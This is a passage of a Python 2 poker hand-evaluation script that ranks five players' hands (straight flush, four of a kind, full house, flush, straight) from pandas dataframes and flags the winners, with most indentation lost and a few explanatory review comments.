if list[0] == list[1] and list[1] == list[2] and list[2] == list[3] and list[3] == list[4]:
SF = SF + 1
else:
a1 = 0
# With Ace High
list[0] = df1.iloc[i * 4 + k - 1, 1]
list[1] = df1.iloc[i * 4 + k - 1, 3]
list[2] = df1.iloc[i * 4 + k - 1, 5]
list[3] = df1.iloc[i * 4 + k - 1, 7]
list[4] = df1.iloc[i * 4 + k - 1, 9]
list = np.sort(list).tolist()
if list[0]+1 == list[1] and list[1]+1 == list[2] and list[2]+1 == list[3] and list[3]+1 == list[4]:
a1 = max(list[0],list[1],list[2],list[3],list[4])
list[0] = df1.iloc[i * 4 + k - 1, 0]
list[1] = df1.iloc[i * 4 + k - 1, 2]
list[2] = df1.iloc[i * 4 + k - 1, 4]
list[3] = df1.iloc[i * 4 + k - 1, 6]
list[4] = df1.iloc[i * 4 + k - 1, 8]
if list[0] == list[1] and list[1] == list[2] and list[2] == list[3] and list[3] == list[4]:
SF = SF + 1
else:
a1 = 0
#P2 Evaluation
#With Ace Low
list[0] = df2.iloc[i * 4 + k - 1, 1]
list[1] = df2.iloc[i * 4 + k - 1, 3]
list[2] = df2.iloc[i * 4 + k - 1, 5]
list[3] = df2.iloc[i * 4 + k - 1, 7]
list[4] = df2.iloc[i * 4 + k - 1, 9]
for m in range(0, 5):
if list[m] == 14:
list[m] = 1
list = np.sort(list).tolist()
if list[0] + 1 == list[1] and list[1] + 1 == list[2] and list[2] + 1 == list[3] and list[3] + 1 == list[
4]:
a2 = max(list[0], list[1], list[2], list[3], list[4])
list[0] = df2.iloc[i * 4 + k - 1, 0]
list[1] = df2.iloc[i * 4 + k - 1, 2]
list[2] = df2.iloc[i * 4 + k - 1, 4]
list[3] = df2.iloc[i * 4 + k - 1, 6]
list[4] = df2.iloc[i * 4 + k - 1, 8]
if list[0] == list[1] and list[1] == list[2] and list[2] == list[3] and list[3] == list[4]:
SF = SF + 1
else:
a2 = 0
#With Ace High
list[0] = df2.iloc[i * 4 + k - 1, 1]
list[1] = df2.iloc[i * 4 + k - 1, 3]
list[2] = df2.iloc[i * 4 + k - 1, 5]
list[3] = df2.iloc[i * 4 + k - 1, 7]
list[4] = df2.iloc[i * 4 + k - 1, 9]
list = np.sort(list).tolist()
if list[0] + 1 == list[1] and list[1] + 1 == list[2] and list[2] + 1 == list[3] and list[3] + 1 == list[4]:
a2 = max(list[0], list[1], list[2], list[3], list[4])
list[0] = df2.iloc[i * 4 + k - 1, 0]
list[1] = df2.iloc[i * 4 + k - 1, 2]
list[2] = df2.iloc[i * 4 + k - 1, 4]
list[3] = df2.iloc[i * 4 + k - 1, 6]
list[4] = df2.iloc[i * 4 + k - 1, 8]
if list[0] == list[1] and list[1] == list[2] and list[2] == list[3] and list[3] == list[4]:
SF = SF + 1
else:
a2 = 0
# P3 Evaluation
# With Ace Low
list[0] = df3.iloc[i * 4 + k - 1, 1]
list[1] = df3.iloc[i * 4 + k - 1, 3]
list[2] = df3.iloc[i * 4 + k - 1, 5]
list[3] = df3.iloc[i * 4 + k - 1, 7]
list[4] = df3.iloc[i * 4 + k - 1, 9]
for m in range(0, 5):
if list[m] == 14:
list[m] = 1
list = np.sort(list).tolist()
if list[0] + 1 == list[1] and list[1] + 1 == list[2] and list[2] + 1 == list[3] and list[3] + 1 == \
list[
4]:
a3 = max(list[0], list[1], list[2], list[3], list[4])
list[0] = df3.iloc[i * 4 + k - 1, 0]
list[1] = df3.iloc[i * 4 + k - 1, 2]
list[2] = df3.iloc[i * 4 + k - 1, 4]
list[3] = df3.iloc[i * 4 + k - 1, 6]
list[4] = df3.iloc[i * 4 + k - 1, 8]
if list[0] == list[1] and list[1] == list[2] and list[2] == list[3] and list[3] == list[4]:
SF = SF + 1
else:
a3 = 0
#With Ace High
list[0] = df3.iloc[i * 4 + k - 1, 1]
list[1] = df3.iloc[i * 4 + k - 1, 3]
list[2] = df3.iloc[i * 4 + k - 1, 5]
list[3] = df3.iloc[i * 4 + k - 1, 7]
list[4] = df3.iloc[i * 4 + k - 1, 9]
list = np.sort(list).tolist()
if list[0] + 1 == list[1] and list[1] + 1 == list[2] and list[2] + 1 == list[3] and list[3] + 1 == list[4]:
a3 = max(list[0], list[1], list[2], list[3], list[4])
list[0] = df3.iloc[i * 4 + k - 1, 0]
list[1] = df3.iloc[i * 4 + k - 1, 2]
list[2] = df3.iloc[i * 4 + k - 1, 4]
list[3] = df3.iloc[i * 4 + k - 1, 6]
list[4] = df3.iloc[i * 4 + k - 1, 8]
if list[0] == list[1] and list[1] == list[2] and list[2] == list[3] and list[3] == list[4]:
SF = SF + 1
else:
a3 = 0
# P4 Evaluation
# With Ace Low
list[0] = df4.iloc[i * 4 + k - 1, 1]
list[1] = df4.iloc[i * 4 + k - 1, 3]
list[2] = df4.iloc[i * 4 + k - 1, 5]
list[3] = df4.iloc[i * 4 + k - 1, 7]
list[4] = df4.iloc[i * 4 + k - 1, 9]
for m in range(0, 5):
if list[m] == 14:
list[m] = 1
list = np.sort(list).tolist()
if list[0] + 1 == list[1] and list[1] + 1 == list[2] and list[2] + 1 == list[3] and list[3] + 1 == \
list[4]:
a4 = max(list[0], list[1], list[2], list[3], list[4])
list[0] = df4.iloc[i * 4 + k - 1, 0]
list[1] = df4.iloc[i * 4 + k - 1, 2]
list[2] = df4.iloc[i * 4 + k - 1, 4]
list[3] = df4.iloc[i * 4 + k - 1, 6]
list[4] = df4.iloc[i * 4 + k - 1, 8]
if list[0] == list[1] and list[1] == list[2] and list[2] == list[3] and list[3] == list[4]:
SF = SF + 1
else:
a4 = 0
#With Ace High
list[0] = df4.iloc[i * 4 + k - 1, 1]
list[1] = df4.iloc[i * 4 + k - 1, 3]
list[2] = df4.iloc[i * 4 + k - 1, 5]
list[3] = df4.iloc[i * 4 + k - 1, 7]
list[4] = df4.iloc[i * 4 + k - 1, 9]
list = np.sort(list).tolist()
if list[0] + 1 == list[1] and list[1] + 1 == list[2] and list[2] + 1 == list[3] and list[3] + 1 == list[4]:
a4 = max(list[0], list[1], list[2], list[3], list[4])
list[0] = df4.iloc[i * 4 + k - 1, 0]
list[1] = df4.iloc[i * 4 + k - 1, 2]
list[2] = df4.iloc[i * 4 + k - 1, 4]
list[3] = df4.iloc[i * 4 + k - 1, 6]
list[4] = df4.iloc[i * 4 + k - 1, 8]
if list[0] == list[1] and list[1] == list[2] and list[2] == list[3] and list[3] == list[4]:
SF = SF + 1
else:
a4 = 0
# P5 Evaluation
# With Ace Low
list[0] = df5.iloc[i * 4 + k - 1, 1]
list[1] = df5.iloc[i * 4 + k - 1, 3]
list[2] = df5.iloc[i * 4 + k - 1, 5]
list[3] = df5.iloc[i * 4 + k - 1, 7]
list[4] = df5.iloc[i * 4 + k - 1, 9]
for m in range(0, 5):
if list[m] == 14:
list[m] = 1
list = np.sort(list).tolist()
if list[0] + 1 == list[1] and list[1] + 1 == list[2] and list[2] + 1 == list[3] and list[3] + 1 == \
list[4]:
a5 = max(list[0], list[1], list[2], list[3], list[4])
list[0] = df5.iloc[i * 4 + k - 1, 0]
list[1] = df5.iloc[i * 4 + k - 1, 2]
list[2] = df5.iloc[i * 4 + k - 1, 4]
list[3] = df5.iloc[i * 4 + k - 1, 6]
list[4] = df5.iloc[i * 4 + k - 1, 8]
if list[0] == list[1] and list[1] == list[2] and list[2] == list[3] and list[3] == list[4]:
SF = SF + 1
else:
a5 = 0
#With Ace High
list[0] = df5.iloc[i * 4 + k - 1, 1]
list[1] = df5.iloc[i * 4 + k - 1, 3]
list[2] = df5.iloc[i * 4 + k - 1, 5]
list[3] = df5.iloc[i * 4 + k - 1, 7]
list[4] = df5.iloc[i * 4 + k - 1, 9]
list = np.sort(list).tolist()
if list[0] + 1 == list[1] and list[1] + 1 == list[2] and list[2] + 1 == list[3] and list[3] + 1 == list[4]:
a5 = max(list[0], list[1], list[2], list[3], list[4])
list[0] = df5.iloc[i * 4 + k - 1, 0]
list[1] = df5.iloc[i * 4 + k - 1, 2]
list[2] = df5.iloc[i * 4 + k - 1, 4]
list[3] = df5.iloc[i * 4 + k - 1, 6]
list[4] = df5.iloc[i * 4 + k - 1, 8]
if list[0] == list[1] and list[1] == list[2] and list[2] == list[3] and list[3] == list[4]:
SF = SF + 1
else:
a5 = 0
                        #Check for Straight flush: SF > 0 means at least one player's
                        # five ranks were sequential AND all five suits matched;
                        # a1..a5 hold each player's straight-flush top card (0 if none).
                        if (SF > 0):
                            print "Straight Flush"
                            # Highest top card wins the pot.
                            b = max(a1,a2,a3,a4,a5)
                            # Independent ifs: every player tied at b is flagged as a
                            # winner in column 14 of their dataframe.
                            if a1 == b:
                                df1.iloc[i * 4 + k - 1, 14] = 1
                            if a2 == b:
                                df2.iloc[i * 4 + k - 1, 14] = 1
                            if a3 == b:
                                df3.iloc[i * 4 + k - 1, 14] = 1
                            if a4 == b:
                                df4.iloc[i * 4 + k - 1, 14] = 1
                            if a5 == b:
                                df5.iloc[i * 4 + k - 1, 14] = 1
else:
# Check for four of a kind
FK = 0
a1 = 0
a2 = 0
a3 = 0
a4 = 0
a5 = 0
#Evaluate for P1
list[0] = df1.iloc[i * 4 + k - 1, 1]
list[1] = df1.iloc[i * 4 + k - 1, 3]
list[2] = df1.iloc[i * 4 + k - 1, 5]
list[3] = df1.iloc[i * 4 + k - 1, 7]
list[4] = df1.iloc[i * 4 + k - 1, 9]
if list[0] == list[1] and list[1] == list[2] and list[2] == list[3] \
or list[4] == list[1] and list[1] == list[2] and list[2] == list[3] \
or list[0] == list[4] and list[4] == list[2] and list[2] == list[3] \
or list[0] == list[1] and list[1] == list[4] and list[4] == list[3] \
or list[0] == list[1] and list[1] == list[2] and list[2] == list[4]:
FK = FK + 1
a1 = list[0]
#Evaluate for P2
list[0] = df2.iloc[i * 4 + k - 1, 1]
list[1] = df2.iloc[i * 4 + k - 1, 3]
list[2] = df2.iloc[i * 4 + k - 1, 5]
list[3] = df2.iloc[i * 4 + k - 1, 7]
list[4] = df2.iloc[i * 4 + k - 1, 9]
if list[0] == list[1] and list[1] == list[2] and list[2] == list[3] \
or list[4] == list[1] and list[1] == list[2] and list[2] == list[3] \
or list[0] == list[4] and list[4] == list[2] and list[2] == list[3] \
or list[0] == list[1] and list[1] == list[4] and list[4] == list[3] \
or list[0] == list[1] and list[1] == list[2] and list[2] == list[4]:
FK = FK + 1
a2 = list[0]
#Evaluate for P3
list[0] = df3.iloc[i * 4 + k - 1, 1]
list[1] = df3.iloc[i * 4 + k - 1, 3]
list[2] = df3.iloc[i * 4 + k - 1, 5]
list[3] = df3.iloc[i * 4 + k - 1, 7]
list[4] = df3.iloc[i * 4 + k - 1, 9]
if list[0] == list[1] and list[1] == list[2] and list[2] == list[3] \
or list[4] == list[1] and list[1] == list[2] and list[2] == list[3] \
or list[0] == list[4] and list[4] == list[2] and list[2] == list[3] \
or list[0] == list[1] and list[1] == list[4] and list[4] == list[3] \
or list[0] == list[1] and list[1] == list[2] and list[2] == list[4]:
FK = FK + 1
a3 = list[0]
#Evaluate for P4
list[0] = df4.iloc[i * 4 + k - 1, 1]
list[1] = df4.iloc[i * 4 + k - 1, 3]
list[2] = df4.iloc[i * 4 + k - 1, 5]
list[3] = df4.iloc[i * 4 + k - 1, 7]
list[4] = df4.iloc[i * 4 + k - 1, 9]
if list[0] == list[1] and list[1] == list[2] and list[2] == list[3] \
or list[4] == list[1] and list[1] == list[2] and list[2] == list[3] \
or list[0] == list[4] and list[4] == list[2] and list[2] == list[3] \
or list[0] == list[1] and list[1] == list[4] and list[4] == list[3] \
or list[0] == list[1] and list[1] == list[2] and list[2] == list[4]:
FK = FK + 1
a4 = list[0]
#Evaluate for P5
list[0] = df5.iloc[i * 4 + k - 1, 1]
list[1] = df5.iloc[i * 4 + k - 1, 3]
list[2] = df5.iloc[i * 4 + k - 1, 5]
list[3] = df5.iloc[i * 4 + k - 1, 7]
list[4] = df5.iloc[i * 4 + k - 1, 9]
if list[0] == list[1] and list[1] == list[2] and list[2] == list[3] \
or list[4] == list[1] and list[1] == list[2] and list[2] == list[3] \
or list[0] == list[4] and list[4] == list[2] and list[2] == list[3] \
or list[0] == list[1] and list[1] == list[4] and list[4] == list[3] \
or list[0] == list[1] and list[1] == list[2] and list[2] == list[4]:
FK = FK + 1
a5 = list[0]
                            #Checking for Four of a kind: FK counts players whose hand
                            # held four equal ranks; a1..a5 record that rank (0 if none).
                            if(FK > 0):
                                print "Four of a kind"
                                # Highest quads rank wins; ties all get flagged.
                                b = max(a1, a2, a3, a4, a5)
                                if a1 == b:
                                    df1.iloc[i * 4 + k - 1, 14] = 1
                                if a2 == b:
                                    df2.iloc[i * 4 + k - 1, 14] = 1
                                if a3 == b:
                                    df3.iloc[i * 4 + k - 1, 14] = 1
                                if a4 == b:
                                    df4.iloc[i * 4 + k - 1, 14] = 1
                                if a5 == b:
                                    df5.iloc[i * 4 + k - 1, 14] = 1
else:
#Check for full house
FH = 0
a1i = 0
a1ii = 0
a2i = 0
a2ii = 0
a3i = 0
a3ii = 0
a4i = 0
a4ii = 0
a5i = 0
a5ii = 0
# Evaluate for P1
list[0] = df1.iloc[i * 4 + k - 1, 1]
list[1] = df1.iloc[i * 4 + k - 1, 3]
list[2] = df1.iloc[i * 4 + k - 1, 5]
list[3] = df1.iloc[i * 4 + k - 1, 7]
list[4] = df1.iloc[i * 4 + k - 1, 9]
if list[0] == list[1] and list[1] == list[2] and list[3] == list[4]:
a1i = list[0]
a1ii = list[3]
FH = FH + 1
elif list[0] == list[1] and list[1] == list[3] and list[2] == list[4]:
a1i = list[0]
a1ii = list[4]
FH = FH + 1
elif list[0] == list[1] and list[1] == list[4] and list[3] == list[2]:
a1i = list[0]
a1ii = list[2]
FH = FH + 1
elif list[0] == list[3] and list[3] == list[2] and list[1] == list[4]:
a1i = list[0]
a1ii = list[4]
FH = FH + 1
elif list[0] == list[4] and list[4] == list[2] and list[3] == list[1]:
a1i = list[0]
a1ii = list[1]
FH = FH + 1
elif list[3] == list[1] and list[1] == list[2] and list[0] == list[4]:
a1i = list[3]
a1ii = list[4]
FH = FH + 1
elif list[4] == list[1] and list[1] == list[2] and list[3] == list[0]:
a1i = list[4]
a1ii = list[3]
FH = FH + 1
elif list[0] == list[3] and list[3] == list[4] and list[1] == list[2]:
a1i = list[0]
a1ii = list[1]
FH = FH + 1
elif list[3] == list[1] and list[1] == list[4] and list[2] == list[0]:
a1i = list[3]
a1ii = list[2]
FH = FH + 1
elif list[3] == list[4] and list[4] == list[2] and list[0] == list[1]:
a1i = list[3]
a1ii = list[1]
FH = FH + 1
# Evaluate for P2
list[0] = df2.iloc[i * 4 + k - 1, 1]
list[1] = df2.iloc[i * 4 + k - 1, 3]
list[2] = df2.iloc[i * 4 + k - 1, 5]
list[3] = df2.iloc[i * 4 + k - 1, 7]
list[4] = df2.iloc[i * 4 + k - 1, 9]
if list[0] == list[1] and list[1] == list[2] and list[3] == list[4]:
a2i = list[0]
a2ii = list[3]
FH = FH + 1
elif list[0] == list[1] and list[1] == list[3] and list[2] == list[4]:
a2i = list[0]
a2ii = list[4]
FH = FH + 1
elif list[0] == list[1] and list[1] == list[4] and list[3] == list[2]:
a2i = list[0]
a2ii = list[2]
FH = FH + 1
elif list[0] == list[3] and list[3] == list[2] and list[1] == list[4]:
a2i = list[0]
a2ii = list[4]
FH = FH + 1
elif list[0] == list[4] and list[4] == list[2] and list[3] == list[1]:
a2i = list[0]
a2ii = list[1]
FH = FH + 1
elif list[3] == list[1] and list[1] == list[2] and list[0] == list[4]:
a2i = list[3]
a2ii = list[4]
FH = FH + 1
elif list[4] == list[1] and list[1] == list[2] and list[3] == list[0]:
a2i = list[4]
a2ii = list[3]
FH = FH + 1
elif list[0] == list[3] and list[3] == list[4] and list[1] == list[2]:
a2i = list[0]
a2ii = list[1]
FH = FH + 1
elif list[3] == list[1] and list[1] == list[4] and list[2] == list[0]:
a2i = list[3]
a2ii = list[2]
FH = FH + 1
elif list[3] == list[4] and list[4] == list[2] and list[0] == list[1]:
a2i = list[3]
a2ii = list[1]
FH = FH + 1
# Evaluate for P3
list[0] = df3.iloc[i * 4 + k - 1, 1]
list[1] = df3.iloc[i * 4 + k - 1, 3]
list[2] = df3.iloc[i * 4 + k - 1, 5]
list[3] = df3.iloc[i * 4 + k - 1, 7]
list[4] = df3.iloc[i * 4 + k - 1, 9]
if list[0] == list[1] and list[1] == list[2] and list[3] == list[4]:
a3i = list[0]
a3ii = list[3]
FH = FH + 1
elif list[0] == list[1] and list[1] == list[3] and list[2] == list[4]:
a3i = list[0]
a3ii = list[4]
FH = FH + 1
elif list[0] == list[1] and list[1] == list[4] and list[3] == list[2]:
a3i = list[0]
a3ii = list[2]
FH = FH + 1
elif list[0] == list[3] and list[3] == list[2] and list[1] == list[4]:
a3i = list[0]
a3ii = list[4]
FH = FH + 1
elif list[0] == list[4] and list[4] == list[2] and list[3] == list[1]:
a3i = list[0]
a3ii = list[1]
FH = FH + 1
elif list[3] == list[1] and list[1] == list[2] and list[0] == list[4]:
a3i = list[3]
a3ii = list[4]
FH = FH + 1
elif list[4] == list[1] and list[1] == list[2] and list[3] == list[0]:
a3i = list[4]
a3ii = list[3]
FH = FH + 1
elif list[0] == list[3] and list[3] == list[4] and list[1] == list[2]:
a3i = list[0]
a3ii = list[1]
FH = FH + 1
elif list[3] == list[1] and list[1] == list[4] and list[2] == list[0]:
a3i = list[3]
a3ii = list[2]
FH = FH + 1
elif list[3] == list[4] and list[4] == list[2] and list[0] == list[1]:
a3i = list[3]
a3ii = list[1]
FH = FH + 1
# Evaluate for P4
list[0] = df4.iloc[i * 4 + k - 1, 1]
list[1] = df4.iloc[i * 4 + k - 1, 3]
list[2] = df4.iloc[i * 4 + k - 1, 5]
list[3] = df4.iloc[i * 4 + k - 1, 7]
list[4] = df4.iloc[i * 4 + k - 1, 9]
if list[0] == list[1] and list[1] == list[2] and list[3] == list[4]:
a4i = list[0]
a4ii = list[3]
FH = FH + 1
elif list[0] == list[1] and list[1] == list[3] and list[2] == list[4]:
a4i = list[0]
a4ii = list[4]
FH = FH + 1
elif list[0] == list[1] and list[1] == list[4] and list[3] == list[2]:
a4i = list[0]
a4ii = list[2]
FH = FH + 1
elif list[0] == list[3] and list[3] == list[2] and list[1] == list[4]:
a4i = list[0]
a4ii = list[4]
FH = FH + 1
elif list[0] == list[4] and list[4] == list[2] and list[3] == list[1]:
a4i = list[0]
a4ii = list[1]
FH = FH + 1
elif list[3] == list[1] and list[1] == list[2] and list[0] == list[4]:
a4i = list[3]
a4ii = list[4]
FH = FH + 1
elif list[4] == list[1] and list[1] == list[2] and list[3] == list[0]:
a4i = list[4]
a4ii = list[3]
FH = FH + 1
elif list[0] == list[3] and list[3] == list[4] and list[1] == list[2]:
a4i = list[0]
a4ii = list[1]
FH = FH + 1
elif list[3] == list[1] and list[1] == list[4] and list[2] == list[0]:
a4i = list[3]
a4ii = list[2]
FH = FH + 1
elif list[3] == list[4] and list[4] == list[2] and list[0] == list[1]:
a4i = list[3]
a4ii = list[1]
FH = FH + 1
# Evaluate for P5
list[0] = df5.iloc[i * 4 + k - 1, 1]
list[1] = df5.iloc[i * 4 + k - 1, 3]
list[2] = df5.iloc[i * 4 + k - 1, 5]
list[3] = df5.iloc[i * 4 + k - 1, 7]
list[4] = df5.iloc[i * 4 + k - 1, 9]
if list[0] == list[1] and list[1] == list[2] and list[3] == list[4]:
a5i = list[0]
a5ii = list[3]
FH = FH + 1
elif list[0] == list[1] and list[1] == list[3] and list[2] == list[4]:
a5i = list[0]
a5ii = list[4]
FH = FH + 1
elif list[0] == list[1] and list[1] == list[4] and list[3] == list[2]:
a5i = list[0]
a5ii = list[2]
FH = FH + 1
elif list[0] == list[3] and list[3] == list[2] and list[1] == list[4]:
a5i = list[0]
a5ii = list[4]
FH = FH + 1
elif list[0] == list[4] and list[4] == list[2] and list[3] == list[1]:
a5i = list[0]
a5ii = list[1]
FH = FH + 1
elif list[3] == list[1] and list[1] == list[2] and list[0] == list[4]:
a5i = list[3]
a5ii = list[4]
FH = FH + 1
elif list[4] == list[1] and list[1] == list[2] and list[3] == list[0]:
a5i = list[4]
a5ii = list[3]
FH = FH + 1
elif list[0] == list[3] and list[3] == list[4] and list[1] == list[2]:
a5i = list[0]
a5ii = list[1]
FH = FH + 1
elif list[3] == list[1] and list[1] == list[4] and list[2] == list[0]:
a5i = list[3]
a5ii = list[2]
FH = FH + 1
elif list[3] == list[4] and list[4] == list[2] and list[0] == list[1]:
a5i = list[3]
a5ii = list[1]
FH = FH + 1
#Evaluating for Full House
if (FH > 1):
print "Full House"
b = max(a1i, a2i, a3i, a4i, a5i)
c = 0
if a1i == b:
c = c + 1
elif a2i == b:
c = c + 1
elif a3i == b:
c = c + 1
elif a4i == b:
c = c + 1
elif a5i == b:
c = c + 1
if c > 1:
print "Full House"
b = max(a1ii, a2ii, a3ii, a4ii, a5ii)
if a1ii == b:
df1.iloc[i * 4 + k - 1, 14] = 1
if a2ii == b:
df2.iloc[i * 4 + k - 1, 14] = 1
if a3ii == b:
df3.iloc[i * 4 + k - 1, 14] = 1
if a4ii == b:
df4.iloc[i * 4 + k - 1, 14] = 1
if a5ii == b:
df5.iloc[i * 4 + k - 1, 14] = 1
else:
print "Full House"
b = max(a1i, a2i, a3i, a4i, a5i)
if a1i == b:
df1.iloc[i * 4 + k - 1, 14] = 1
if a2i == b:
df2.iloc[i * 4 + k - 1, 14] = 1
if a3i == b:
df3.iloc[i * 4 + k - 1, 14] = 1
if a4i == b:
df4.iloc[i * 4 + k - 1, 14] = 1
if a5i == b:
df5.iloc[i * 4 + k - 1, 14] = 1
elif (FH == 1):
print "Full House"
b = max(a1i,a2i,a3i,a4i,a5i)
if a1i == b:
df1.iloc[i * 4 + k - 1, 14] = 1
elif a2i == b:
df2.iloc[i * 4 + k - 1, 14] = 1
elif a3i == b:
df3.iloc[i * 4 + k - 1, 14] = 1
elif a4i == b:
df4.iloc[i * 4 + k - 1, 14] = 1
elif a5i == b:
df5.iloc[i * 4 + k - 1, 14] = 1
else:
#Evaluate for Flush
F = 0
a1 = 0
a2 = 0
a3 = 0
a4 = 0
a5 = 0
#Evaluate P1
list[0] = df1.iloc[i * 4 + k - 1, 0]
list[1] = df1.iloc[i * 4 + k - 1, 2]
list[2] = df1.iloc[i * 4 + k - 1, 4]
list[3] = df1.iloc[i * 4 + k - 1, 6]
list[4] = df1.iloc[i * 4 + k - 1, 8]
if list[0] == list[1] and list[1] == list[2] and list[2] == list[3] and list[3] == list[4]:
F = F + 1
a1 = max(df1.iloc[i * 4 + k - 1, 1], df1.iloc[i * 4 + k - 1, 3], df1.iloc[i * 4 + k - 1, 5],
df1.iloc[i * 4 + k - 1, 7], df1.iloc[i * 4 + k - 1, 9])
# Evaluate P2
list[0] = df2.iloc[i * 4 + k - 1, 0]
list[1] = df2.iloc[i * 4 + k - 1, 2]
list[2] = df2.iloc[i * 4 + k - 1, 4]
list[3] = df2.iloc[i * 4 + k - 1, 6]
list[4] = df2.iloc[i * 4 + k - 1, 8]
if list[0] == list[1] and list[1] == list[2] and list[2] == list[3] and list[3] == list[
4]:
F = F + 1
a2 = max(df2.iloc[i * 4 + k - 1, 1], df2.iloc[i * 4 + k - 1, 3], df2.iloc[i * 4 + k - 1, 5],
df2.iloc[i * 4 + k - 1, 7], df2.iloc[i * 4 + k - 1, 9])
# Evaluate P3
list[0] = df3.iloc[i * 4 + k - 1, 0]
list[1] = df3.iloc[i * 4 + k - 1, 2]
list[2] = df3.iloc[i * 4 + k - 1, 4]
list[3] = df3.iloc[i * 4 + k - 1, 6]
list[4] = df3.iloc[i * 4 + k - 1, 8]
if list[0] == list[1] and list[1] == list[2] and list[2] == list[3] and list[3] == \
list[4]:
F = F + 1
a3 = max(df3.iloc[i * 4 + k - 1, 1], df3.iloc[i * 4 + k - 1, 3], df3.iloc[i * 4 + k - 1, 5],
df3.iloc[i * 4 + k - 1, 7], df3.iloc[i * 4 + k - 1, 9])
# Evaluate P4
list[0] = df4.iloc[i * 4 + k - 1, 0]
list[1] = df4.iloc[i * 4 + k - 1, 2]
list[2] = df4.iloc[i * 4 + k - 1, 4]
list[3] = df4.iloc[i * 4 + k - 1, 6]
list[4] = df4.iloc[i * 4 + k - 1, 8]
if list[0] == list[1] and list[1] == list[2] and list[2] == list[3] and list[
3] == list[4]:
F = F + 1
a4 = max(df4.iloc[i * 4 + k - 1, 1], df4.iloc[i * 4 + k - 1, 3], df4.iloc[i * 4 + k - 1, 5],
df4.iloc[i * 4 + k - 1, 7], df4.iloc[i * 4 + k - 1, 9])
# Evaluate P5
list[0] = df5.iloc[i * 4 + k - 1, 0]
list[1] = df5.iloc[i * 4 + k - 1, 2]
list[2] = df5.iloc[i * 4 + k - 1, 4]
list[3] = df5.iloc[i * 4 + k - 1, 6]
list[4] = df5.iloc[i * 4 + k - 1, 8]
if list[0] == list[1] and list[1] == list[2] and list[2] == list[3] and \
list[3] == list[4]:
F = F + 1
a5 = max(df5.iloc[i * 4 + k - 1, 1], df5.iloc[i * 4 + k - 1, 3], df5.iloc[i * 4 + k - 1, 5],
df5.iloc[i * 4 + k - 1, 7], df5.iloc[i * 4 + k - 1, 9])
                                    # F > 0: at least one player held five cards of one suit;
                                    # a1..a5 = that player's highest card rank (0 if no flush).
                                    if F > 0:
                                        print "Flush"
                                        b = max(a1, a2, a3, a4, a5)
                                        # NOTE(review): elif chain marks only the FIRST player
                                        # tied at b, unlike the straight-flush branch which
                                        # marks every tied player - confirm which is intended.
                                        if a1 == b:
                                            df1.iloc[i * 4 + k - 1, 14] = 1
                                        elif a2 == b:
                                            df2.iloc[i * 4 + k - 1, 14] = 1
                                        elif a3 == b:
                                            df3.iloc[i * 4 + k - 1, 14] = 1
                                        elif a4 == b:
                                            df4.iloc[i * 4 + k - 1, 14] = 1
                                        elif a5 == b:
                                            df5.iloc[i * 4 + k - 1, 14] = 1
else:
#Check for Straight
SF = 0
a1 = 0
a2 = 0
a3 = 0
a4 = 0
a5 = 0
# P1 Evaluation
# With Ace Low
list[0] = df1.iloc[i * 4 + k - 1, 1]
list[1] = df1.iloc[i * 4 + k - 1, 3]
list[2] = df1.iloc[i * 4 + k - 1, 5]
list[3] = df1.iloc[i * 4 + k - 1, 7]
list[4] = df1.iloc[i * 4 + k - 1, 9]
for m in range(0, 5):
if list[m] == 14:
list[m] = 1
list = np.sort(list).tolist()
if list[0] + 1 == list[1] and list[1] + 1 == list[2] and list[2] + 1 == list[3] and \
list[3] + 1 == list[4]:
a1 = max(list[0], list[1], list[2], list[3], list[4])
SF = SF + 1
# With Ace High
for m in range(0, 5):
if list[m] == 1:
list[m] = 14
list = np.sort(list).tolist()
if list[0] + 1 == list[1] and list[1] + 1 == list[2] and list[2] + 1 == list[3] and \
list[3] + 1 == list[4]:
a1 = max(list[0], list[1], list[2], list[3], list[4])
SF = SF + 1
# P2 Evaluation
# With Ace Low
list[0] = df2.iloc[i * 4 + k - 1, 1]
list[1] = df2.iloc[i * 4 + k - 1, 3]
list[2] = df2.iloc[i * 4 + k - 1, 5]
list[3] = df2.iloc[i * 4 + k - 1, 7]
list[4] = df2.iloc[i * 4 + k - 1, 9]
for m in range(0, 5):
if list[m] == 14:
list[m] = 1
list = np.sort(list).tolist()
if list[0] + 1 == list[1] and list[1] + 1 == list[2] and list[2] + 1 == list[3] and \
list[3] + 1 == list[
4]:
a2 = max(list[0], list[1], list[2], list[3], list[4])
SF = SF + 1
# With Ace High
for m in range(0, 5):
if list[m] == 1:
list[m] = 14
list = np.sort(list).tolist()
if list[0] + 1 == list[1] and list[1] + 1 == list[2] and list[2] + 1 == list[3] and \
list[3] + 1 == list[4]:
a2 = max(list[0], list[1], list[2], list[3], list[4])
SF = SF + 1
# P3 Evaluation
# With Ace Low
list[0] = df3.iloc[i * 4 + k - 1, 1]
list[1] = df3.iloc[i * 4 + k - 1, 3]
list[2] = df3.iloc[i * 4 + k - 1, 5]
list[3] = df3.iloc[i * 4 + k - 1, 7]
list[4] = df3.iloc[i * 4 + k - 1, 9]
for m in range(0, 5):
if list[m] == 14:
list[m] = 1
list = np.sort(list).tolist()
if list[0] + 1 == list[1] and list[1] + 1 == list[2] and list[2] + 1 == list[3] and \
list[3] + 1 == \
list[
4]:
a3 = max(list[0], list[1], list[2], list[3], list[4])
SF = SF + 1
# With Ace High
for m in range(0, 5):
if list[m] == 1:
list[m] = 14
list = np.sort(list).tolist()
if list[0] + 1 == list[1] and list[1] + 1 == list[2] and list[2] + 1 == list[3] and \
list[3] + 1 == list[4]:
a3 = max(list[0], list[1], list[2], list[3], list[4])
SF = SF + 1
# P4 Evaluation
# With Ace Low
list[0] = df4.iloc[i * 4 + k - 1, 1]
list[1] = df4.iloc[i * 4 + k - 1, 3]
list[2] = df4.iloc[i * 4 + k - 1, 5]
list[3] = df4.iloc[i * 4 + k - 1, 7]
list[4] = df4.iloc[i * 4 + k - 1, 9]
for m in range(0, 5):
if list[m] == 14:
list[m] = 1
list = np.sort(list).tolist()
if list[0] + 1 == list[1] and list[1] + 1 == list[2] and list[2] + 1 == list[3] and \
list[3] + 1 == \
list[4]:
a4 = max(list[0], list[1], list[2], list[3], list[4])
SF = SF + 1
# With Ace High
for m in range(0, 5):
if list[m] == 1:
list[m] = 14
list = np.sort(list).tolist()
if list[0] + 1 == list[1] and list[1] + 1 == list[2] and list[2] + 1 == list[3] and \
list[3] + 1 == list[4]:
a4 = max(list[0], list[1], list[2], list[3], list[4])
SF = SF + 1
# P5 Evaluation
# With Ace Low
list[0] = df5.iloc[i * 4 + k - 1, 1]
list[1] = df5.iloc[i * 4 + k - 1, 3]
list[2] = df5.iloc[i * 4 + k - 1, 5]
